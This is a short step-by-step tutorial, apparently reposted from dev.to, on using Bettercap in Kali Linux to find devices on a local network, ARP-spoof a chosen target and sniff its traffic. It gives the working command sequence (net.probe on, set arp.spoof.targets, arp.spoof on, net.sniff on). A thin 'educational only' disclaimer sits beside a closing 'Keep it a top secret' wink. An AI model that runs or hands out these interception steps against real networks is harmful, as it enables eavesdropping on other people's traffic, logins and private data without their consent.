
🔧 Hacking the Network: Spying on Devices with Bettercap in Kali Linux

Nachrichtenbereich: 🔧 Programmierung
🔗 Quelle: dev.to

Here's a step-by-step guide for using Bettercap to spy on devices within a network. Note that this is for educational and ethical purposes only.

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This guide is for educational purposes only. We are attacking and monitoring our own Windows machine on a private network to track activities. Unauthorized use on other devices or networks is illegal.

With this method, no additional Wi-Fi monitoring tools are needed. Bettercap itself is powerful enough to intercept and analyze network traffic directly, making it a versatile option for tracking activities on your network or device.

Step 1:Installing buttercap tool

-->Open Kali Linux
-->Go to the terminal in Kali Linux
-->For moving from normal directories to root directories, Give the command

sudo su

Enter your password.
-->Install bettercap by giving the command

sudo apt install bettercap

Image description

-->To verify the installation, Run:

bettercap --version

If installed correctly, the version will be displayed.

Step 2:Run bettercap

--> Run the command:

sudo bettercap

Image description

Step 3:Getting all device's IP addresses which are connected to the same network in our Kali Linux

--> Just run command

net.probe on

You have all the IP addresses of connected devices but they are not arranged properly, To arrange them run command:


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step 4:Set the target devices on which we are spying by giving their IP addresses

-->Enable ARP spoofing to intercept traffic:

set arp.spoof.targets <target_ip>

-->Start ARP spoofing:

arp.spoof on

Image description

Step 5:To display captured data from the target device

-->Enable the network sniffer

net.sniff on

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You can see all the data or packets are captured from target device at current time

For Demo

(we are capturing all current network/data of Windows machine on our kali Linux which is a different machine)

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Now we can see all the activities of target devices

Step 6:To exit



Image description

shhhhhh!!! Keep it a top secret!!


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